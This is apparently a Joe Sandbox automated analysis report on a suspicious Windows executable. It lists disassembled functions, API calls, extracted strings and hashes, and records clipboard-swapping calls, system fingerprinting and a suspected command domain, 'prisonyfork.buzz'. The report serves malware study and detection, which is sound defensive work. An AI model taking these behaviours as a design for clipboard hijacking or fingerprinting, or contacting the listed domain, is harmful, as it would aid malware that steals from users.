Part of subcall function 00B8060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B7F354,00000000,?,?,?,00B7F354,00B73D4A,00BA759C,00B73D4A), ref: 00B8066D

Part of subcall function 00B88353: IsProcessorFeaturePresent.KERNEL32(00000017,00B8378B,?,?,?,?,00000000,?,?,?,00B7B5AC,00B7B4E0,00000000,?,?,00B7B4E0), ref: 00B8836F

Strings

csm, xrefs: 00B7B86D

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: f80b4ed6ac2b2c8b428883eb918f6fd76ed9c8cff009bec8a1e57d71f200fb36
Instruction ID: 052462dde8d2166ac83dad6dddb28942816795aac67f5bbcf8e90d5dae55e843
Opcode Fuzzy Hash: f80b4ed6ac2b2c8b428883eb918f6fd76ed9c8cff009bec8a1e57d71f200fb36
Instruction Fuzzy Hash: 02219D31D00218EBCF24DF99C845BAEB7F8EF44710F148499E469AB150CB70AE45DF92

Function 00B7B46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00B72673

Strings

ios_base::badbit set, xrefs: 00B72650
bad array new length, xrefs: 00B72626

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ___std_exception_copy
String ID: bad array new length$ios_base::badbit set
API String ID: 2659868963-1158432155
Opcode ID: 539b956e85cc7c21d7e6d1a0e1fa62d48ea3e6b7994fb7f366615bd01e38b5a2
Instruction ID: e1ffc17632247593de32c96ff616540d07306462224550819390ec3e6fc90a48
Opcode Fuzzy Hash: 539b956e85cc7c21d7e6d1a0e1fa62d48ea3e6b7994fb7f366615bd01e38b5a2
Instruction Fuzzy Hash: 6301DFF2518300ABDB04EF28D856A1A7BE4EF05318F1088ADF46D9B311E775E808CB81

Function 00B72610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00B8060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B7F354,00000000,?,?,?,00B7F354,00B73D4A,00BA759C,00B73D4A), ref: 00B8066D

___std_exception_copy.LIBVCRUNTIME ref: 00B72673

Strings

ios_base::badbit set, xrefs: 00B72650
bad array new length, xrefs: 00B72626

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: bad array new length$ios_base::badbit set
API String ID: 3109751735-1158432155
Opcode ID: f075f5b5beac347437f3026137740bf5fbea3f3c8edfed9a3ee2f99f5f282105
Instruction ID: 9cfe39220b1f00aa9a2193bce93b6d0dbf16d5d9af995b07cbc3286b6fe1ec47
Opcode Fuzzy Hash: f075f5b5beac347437f3026137740bf5fbea3f3c8edfed9a3ee2f99f5f282105
Instruction Fuzzy Hash: EAF030F2918300ABDB00AF19DC4674BBBE4EB55758F018CADF598AB311D3B5D448CB92

Analysis Process: 0x001f00000004676d-1858.exePID: 2020, Parent PID: 6192COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	6.7%
Signature Coverage:	41.4%
Total number of Nodes:	239
Total number of Limit Nodes:	14

Executed Functions

Function 00411A80 Relevance: 192.9, APIs: 3, Strings: 106, Instructions: 2102COMMON

Download Yara Rule

Strings

i, xrefs: 004126E9
/, xrefs: 0041339B
9, xrefs: 004133EB
}, xrefs: 004123D3
8, xrefs: 00412099
t, xrefs: 004130F0
;, xrefs: 00411C3A
v, xrefs: 004130E0
(, xrefs: 00411C35
j, xrefs: 004131C0
R, xrefs: 00412D99
9, xrefs: 004127FF
*, xrefs: 00412D79
L, xrefs: 00412817
N, xrefs: 00412DC9
", xrefs: 0041280F
|, xrefs: 00413130
, xrefs: 00412C3D
2, xrefs: 004134B3
k, xrefs: 004126F3
., xrefs: 004127EF
~, xrefs: 00412BD7
r, xrefs: 004123FB
@, xrefs: 00411C3F
=, xrefs: 0041340B
z, xrefs: 00413140
w, xrefs: 004127DF
h, xrefs: 004131D0
N, xrefs: 00412807
1, xrefs: 0041342B
X, xrefs: 00413050
%, xrefs: 004134C3
Z, xrefs: 00412DA9
', xrefs: 004133DB
-, xrefs: 00413463
b, xrefs: 00413180
8, xrefs: 004131B8
5, xrefs: 004134D3
s, xrefs: 00412403
%, xrefs: 00412FC6
#, xrefs: 004133BB
7, xrefs: 0041345B
I, xrefs: 004134A3
D, xrefs: 004135DD
!, xrefs: 004133AB
5, xrefs: 0041344B
D, xrefs: 0041398C
B, xrefs: 004127E7
;, xrefs: 004133FB
`, xrefs: 00413190
), xrefs: 00413473
N, xrefs: 004130A0
eb, xrefs: 00411D39
~, xrefs: 00413120
n, xrefs: 004131A0
%, xrefs: 004133CB
B, xrefs: 00413080
*, xrefs: 00413068
+, xrefs: 00412247
j, xrefs: 004126EE
+, xrefs: 00411DCF
L, xrefs: 00412DB9
3, xrefs: 0041343B
f, xrefs: 00413160
", xrefs: 004130A8
), xrefs: 00413098
J, xrefs: 00412827
2, xrefs: 0041239B
y, xrefs: 004123B3
r, xrefs: 00413100
L, xrefs: 004130B0
+, xrefs: 004134E3
,, xrefs: 00413493
%, xrefs: 0041299C
K, xrefs: 00411AE3
I, xrefs: 004131D8
w, xrefs: 00412DD9
t, xrefs: 00412DE9
D, xrefs: 00413070
`, xrefs: 00412A51
p, xrefs: 00413110
q, xrefs: 004123F3
H, xrefs: 004130D0
P, xrefs: 00412C38
{, xrefs: 004123C3
x, xrefs: 00413150
/, xrefs: 00412D89
C, xrefs: 00411F4A
], xrefs: 00413138
@, xrefs: 00413090
l, xrefs: 004131B0
u, xrefs: 00412BD2
d, xrefs: 00413170
", xrefs: 004130E8
a, xrefs: 0041238B
l, xrefs: 004126E4
i, xrefs: 004130D8
Z, xrefs: 00413040
O, xrefs: 004131A8
M, xrefs: 0041281F
8, xrefs: 00411DCA
?, xrefs: 0041341B
-, xrefs: 0041338B
@, xrefs: 004127F7
J, xrefs: 004130C0
F, xrefs: 00413060

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: $!$"$"$"$#$%$%$%$%$'$($)$)$*$*$+$+$+$,$-$-$.$/$/$1$2$2$3$5$5$7$8$8$8$9$9$;$;$=$?$@$@$@$B$B$C$D$D$D$F$H$I$I$J$J$K$L$L$L$M$N$N$N$O$P$R$X$Z$Z$]$`$`$a$b$d$eb$f$h$i$i$j$j$k$l$l$n$p$q$r$r$s$t$t$u$v$w$w$x$y$z${$|$}$~$~
API String ID: 0-1858622422
Opcode ID: ec3464dd80d40b7ce84d8ea57def56273020e48e0b32f28a058f23161c91ceca
Instruction ID: 0088a1e6271aec16a9bf5193a30624042d3ff7d287ab5d8df63cd3450ea7ac36
Opcode Fuzzy Hash: ec3464dd80d40b7ce84d8ea57def56273020e48e0b32f28a058f23161c91ceca
Instruction Fuzzy Hash: 2513DF3150C7C08AD3349B3885443AFBFD1ABD6324F188A6EE5E9873D2D6B88585C75B

Function 00433650 Relevance: 31.6, APIs: 2, Strings: 16, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00433699
GetSystemMetrics.USER32 ref: 004336A9

Strings

?C, xrefs: 00433830
6>C, xrefs: 00433825
0:C, xrefs: 004338B4
0:C, xrefs: 004338A9
0:C, xrefs: 004338CA
-iI, xrefs: 004337E0
0:C, xrefs: 00433846
>C, xrefs: 00433888
0:C, xrefs: 004338D5
0:C, xrefs: 00433872
, xrefs: 00433796
0:C, xrefs: 00433851
C:C, xrefs: 004338BF
0:C, xrefs: 00433867
0:C, xrefs: 0043383B
0:C, xrefs: 0043389E

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: MetricsSystem
String ID: ?C$ $-iI$0:C$0:C$0:C$0:C$0:C$0:C$0:C$0:C$0:C$0:C$6>C$C:C$>C
API String ID: 4116985748-1116947463
Opcode ID: 4bc9faf0d76279a8d3301667b067c5f9f3de18c8ea4b7e03216d47eb7046d489
Instruction ID: 2ee40eae269c76004da94e207fa193a71e79e8ad67abb3411dcb59d3e89f98e8
Opcode Fuzzy Hash: 4bc9faf0d76279a8d3301667b067c5f9f3de18c8ea4b7e03216d47eb7046d489
Instruction Fuzzy Hash: 39815FB45097808FE360DF28D58879BBBF0BB85708F10892EE5988B350DB759949CF5A

Function 00438760 Relevance: 28.7, APIs: 11, Strings: 5, Instructions: 710
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C,00000000), ref: 00438920
SysAllocString.OLEAUT32(798B7F53), ref: 00438999
CoSetProxyBlanket.COMBASE(D2E25865,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004389DF
SysAllocString.OLEAUT32(?), ref: 00438A27
SysAllocString.OLEAUT32(?), ref: 00438AC8
VariantInit.OLEAUT32(1D1C235A), ref: 00438B36
SysFreeString.OLEAUT32(?), ref: 00438E5F
SysFreeString.OLEAUT32(?), ref: 00438E68
SysFreeString.OLEAUT32(?), ref: 00438E7F
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,798B7F53,00000000,00000000,00000000,00000000), ref: 00438EB0

Strings

{x, xrefs: 00438B74
Z[, xrefs: 00438A91
#701, xrefs: 00438809, 00438876
\, xrefs: 004388DA
:, xrefs: 004388CE

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
String ID: #701$:$Z[$\${x
API String ID: 2247799857-2664114237
Opcode ID: ba8d0830d702cf1f498f32e747a0cc90e1873690c72dbd9023af7de7e629be99
Instruction ID: 9a2e13673cb25683851d9d825da35bb2dada979b34960c5b0a665fddef17d1db
Opcode Fuzzy Hash: ba8d0830d702cf1f498f32e747a0cc90e1873690c72dbd9023af7de7e629be99
Instruction Fuzzy Hash: AA22DD71A083408BE710CF29C881B6BFBE1EF99714F149A2DF5959B391C778D806CB96

Function 00423171 Relevance: 23.2, APIs: 2, Strings: 11, Instructions: 427
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 00423197

Strings

+N, xrefs: 004234D6
%S#], xrefs: 004235FE
JB, xrefs: 004234DE
^Y, xrefs: 004234EE
]F, xrefs: 004234E6
EG, xrefs: 00423330
W<Q, xrefs: 004235F6
Bc-m, xrefs: 0042361E
-_xY, xrefs: 00423606
z{, xrefs: 0042364E
+C8M, xrefs: 004235DE

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: W<Q$%S#]$+C8M$+N$-_xY$Bc-m$JB$]F$^Y$z{$EG
API String ID: 237503144-2404918860
Opcode ID: 148f4e02a536243031971f6939d88d6f9ed0bd6edef741434ceda02dc20d3f57
Instruction ID: 83f4eb1c3b0d8489de9cce998ac4f94859e9427af74067a6139ed9f2857c18bf
Opcode Fuzzy Hash: 148f4e02a536243031971f6939d88d6f9ed0bd6edef741434ceda02dc20d3f57
Instruction Fuzzy Hash: EFD1D9B4208340CFD314DF55E89162BBBE0FF86354F58896DF99A8B351E7388906CB5A

Function 05631000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 05631032
OpenClipboard.USER32(00000000), ref: 0563103C
GetClipboardData.USER32(0000000D), ref: 0563104C
GlobalLock.KERNEL32(00000000), ref: 0563105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05631090
GlobalLock.KERNEL32 ref: 056310A0
GlobalUnlock.KERNEL32 ref: 056310C1
EmptyClipboard.USER32 ref: 056310CB
SetClipboardData.USER32(0000000D), ref: 056310D6
GlobalFree.KERNEL32 ref: 056310E3
GlobalUnlock.KERNEL32(?), ref: 056310ED
CloseClipboard.USER32 ref: 056310F3
GetClipboardSequenceNumber.USER32 ref: 056310F9

Memory Dump Source

Source File: 00000005.00000002.3284197492.0000000005631000.00000020.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: true

Associated: 00000005.00000002.3284181844.0000000005630000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3284212494.0000000005632000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5630000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 375d9149cf4f55c0bc7cce78f9158f1ba6eca8beefb2f5dda1744e2b3f7a0a83
Instruction ID: 67cf4b979c147ee18c6f3d4ab38efa33d6f2ccb25f81843e647e09e1a45c75c1
Opcode Fuzzy Hash: 375d9149cf4f55c0bc7cce78f9158f1ba6eca8beefb2f5dda1744e2b3f7a0a83
Instruction Fuzzy Hash: BF21927561C2549BE7202BB1EC0FB6A7FE8FF05781F041468F986D6250EF328800CBA1

Function 004222A2 Relevance: 9.8, Strings: 7, Instructions: 1054COMMON

Download Yara Rule

Strings

PE, xrefs: 004222A4
W_, xrefs: 00422689
prisonyfork.buzz, xrefs: 004227A9
HQ\-, xrefs: 00422406
~q, xrefs: 00422734
v, xrefs: 004224B4
@.B, xrefs: 00422E23

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: @.B$HQ\-$PE$W_$prisonyfork.buzz$v$~q
API String ID: 0-1888932142
Opcode ID: 04c7d214176de03b1430307ba434e37b91b1ba7736a6c41aedf8b1cfde1f7b5a
Instruction ID: 77acf32d1074684472be4293aba1e33b9527bcaf522d8fae9d6ad06f08ee7254
Opcode Fuzzy Hash: 04c7d214176de03b1430307ba434e37b91b1ba7736a6c41aedf8b1cfde1f7b5a
Instruction Fuzzy Hash: FB725175608351DFD324CF28E89076BB7E2FB8A314F59893CE89587391D7789806CB86

Function 0040DEBE Relevance: 9.6, APIs: 2, Strings: 4, Instructions: 603
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0040DECA
CoUninitialize.COMBASE ref: 0040E2CC

Strings

~, xrefs: 0040E389
prisonyfork.buzz, xrefs: 0040E2A6, 0040E6A6
%()., xrefs: 0040E5FC
n, xrefs: 0040E2E1

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Uninitialize
String ID: %().$n$prisonyfork.buzz$~
API String ID: 3861434553-2869926516
Opcode ID: f2bbb2c1cbcc91e4ef295ce591337a990f121c3deeedab843836382ded43cda7
Instruction ID: 651897ea68ee6f7069d920b30b59056feb5ed20b7d1bfed893a11183a5c38717
Opcode Fuzzy Hash: f2bbb2c1cbcc91e4ef295ce591337a990f121c3deeedab843836382ded43cda7
Instruction Fuzzy Hash: 1612BCB05083D28BD325CF2A94A07EFBFE0AF92344F284D6DD4C65B242D779454ACB96

Function 0042CD97 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042D449

Strings

-, xrefs: 0042D46B
Vj o, xrefs: 0042D650
2&<`, xrefs: 0042D579

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: -$2&<`$Vj o
API String ID: 3960555810-4013841480
Opcode ID: 7b4b29f7f4199076616cc93f2ada63d08554570eeaee276e63067f490119246e
Instruction ID: 1a6a7886547517e8ae2b5dbe149c8a27647e6ecca24e251f3d269ca63540ac96
Opcode Fuzzy Hash: 7b4b29f7f4199076616cc93f2ada63d08554570eeaee276e63067f490119246e
Instruction Fuzzy Hash: 56A1097090C3A28BD339CF28D4617BBBFE09F96314F18496ED4D9973C2D67889058B96

Function 00415216 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 517
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

c`, xrefs: 00415306
$, xrefs: 0041556C

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: $$c`
API String ID: 0-842158197
Opcode ID: cef1a91ab35103a38c6fe70e57de15fc0b07ece42d9d05a67113f4f03d58803d
Instruction ID: dd3e1522ea5a8850a169a160a75abdf05389fdd475fb2fb88aaea31f10180a33
Opcode Fuzzy Hash: cef1a91ab35103a38c6fe70e57de15fc0b07ece42d9d05a67113f4f03d58803d
Instruction Fuzzy Hash: 5AF1F275608741CFD7248F24C8827EBB7E1EF96314F14492DE4C987392EB389885CB8A

Function 0041BE10 Relevance: 5.6, Strings: 4, Instructions: 636
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

y{, xrefs: 0041C141
A<=2, xrefs: 0041C4BC
(), xrefs: 0041C273
A<=2, xrefs: 0041C4F0

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: ()$A<=2$A<=2$y{
API String ID: 0-1178100939
Opcode ID: 75a19b7fb81741ea7643bd7e8e06e3541a5ea85208e99a8862e6bfd6a6b66740
Instruction ID: 371181bf0a0259b305efc9fd451e919c184b3c672a1fdfadf1b92273cbdc7a8a
Opcode Fuzzy Hash: 75a19b7fb81741ea7643bd7e8e06e3541a5ea85208e99a8862e6bfd6a6b66740
Instruction Fuzzy Hash: 1D1202B264C3148BD714DF65C8916ABBBF1EFC5314F09892DE4C68B341E7398948CB8A

Function 00427170 Relevance: 5.1, Strings: 4, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

'j7h, xrefs: 004278FB
2v6t, xrefs: 00427906
>n<l, xrefs: 004278F0
+r>p, xrefs: 00427911

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: 'j7h$+r>p$2v6t$>n<l
API String ID: 0-1878794915
Opcode ID: 0cecdb7d0033e94eec28665bae0c7c6e7964b8612a6812e026401c746d4bea93
Instruction ID: cdda9073bcce1cb059af731d24d22a82f0e2fc098b3bbd05ad667cf3db6d1031
Opcode Fuzzy Hash: 0cecdb7d0033e94eec28665bae0c7c6e7964b8612a6812e026401c746d4bea93
Instruction Fuzzy Hash: 0251C2B2A083908BD734CF65984279FBBA2EFD0304F55882DD489AB305D7788905CB8B

Function 0043D970 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00440DBD,00000002,00000018,?,?,00000018,?,?,?), ref: 0043D99E

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043DE17 Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

xjg, xrefs: 0043E35B

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID: xjg
API String ID: 2994545307-3915880236
Opcode ID: 4610e38229922ad4acc99177cc927316dcbe646d1dba9521d0aa321f2d73ce92
Instruction ID: 5ded33b65fbca669af91478c5c49821764fa697413801c9ec5f4f7f5353871f7
Opcode Fuzzy Hash: 4610e38229922ad4acc99177cc927316dcbe646d1dba9521d0aa321f2d73ce92
Instruction Fuzzy Hash: 52112B7834A2148BD7089F5ADCD157B7361EB5B304F28743DDA96D3391C6389916CB0E

Function 0043FCD0 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3987b7edd36b1a6cde4be2b1691b60f82c96886b7340d7894744e00396787d92
Instruction ID: 568f5669e048fcff2113547bc7cef721230b2bf445ca6562d71aca1d6c9b38f7
Opcode Fuzzy Hash: 3987b7edd36b1a6cde4be2b1691b60f82c96886b7340d7894744e00396787d92
Instruction Fuzzy Hash: A0718B31A042015BD7149F28DC51A3B73A2EF9E750F19953EE88687361DB38E855C78A

Function 0043DC6A Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b82ca443d70eac1f7d2601be3b632fc7373ae0e1dff5ce3603d5197433a6ccd
Instruction ID: 846741e3d35176ffb6fefe6c9631efcac028a60c789433ed29bd146e87b43e37
Opcode Fuzzy Hash: 2b82ca443d70eac1f7d2601be3b632fc7373ae0e1dff5ce3603d5197433a6ccd
Instruction Fuzzy Hash: 00415B74758301ABE728DF14FC91F3B73A2E78A300F18E53DE142972D1DA285815C719

Function 0042CB6D Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2309b2129719812af63d8438b1a5ecbc0309b185851f74802701dee54840390b
Instruction ID: 7b0a85920d90c3f6fbfe1a46f9fbd4616777d05728f6bdedd92568305783ed72
Opcode Fuzzy Hash: 2309b2129719812af63d8438b1a5ecbc0309b185851f74802701dee54840390b
Instruction Fuzzy Hash: AD416F216083618BDB29CA3964E127B7B92DF97364F48876DC4D68F3DAC22CC505C39A

Function 0040D715 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 704fb39a0f72f0bd64ee2859d714294bf4f32c350c444f572db3449a1052bb54
Instruction ID: 898019802544eefba0f5fff70ddb6c7d25be2340c2c605c2c39b82dbbc86cf8b
Opcode Fuzzy Hash: 704fb39a0f72f0bd64ee2859d714294bf4f32c350c444f572db3449a1052bb54
Instruction Fuzzy Hash: 993185B89193808BE734CF55C851BABB7E2BFC9300F14982ED0C997391D77855098B1A

Function 00408700 Relevance: 7.6, APIs: 5, Instructions: 81
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408721
